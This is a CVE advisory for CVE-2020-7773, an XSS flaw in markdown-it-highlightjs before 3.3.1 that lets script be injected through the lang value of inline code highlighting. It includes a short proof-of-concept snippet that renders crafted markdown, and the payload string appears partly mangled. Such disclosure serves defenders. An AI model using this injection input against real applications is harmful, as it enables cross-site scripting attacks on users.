CVE-2020-7773

Summary

This affects the package markdown-it-highlightjs before 3.3.1. It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature. const markdownItHighlightjs = require("markdown-it-highlightjs"); const md = require('markdown-it'); const reuslt_xss = md() .use(markdownItHighlightjs, { inline: true }) .render('console.log(42){.">js}'); console.log(reuslt_xss);

Affected Software

VendorProductVersion RangeStatus
n/amarkdown-it-highlightjsunspecified < 3.3.1affected

Weaknesses

  • Cross-site Scripting (XSS)

ADP Enrichment

CVE Program Container

Additional References

References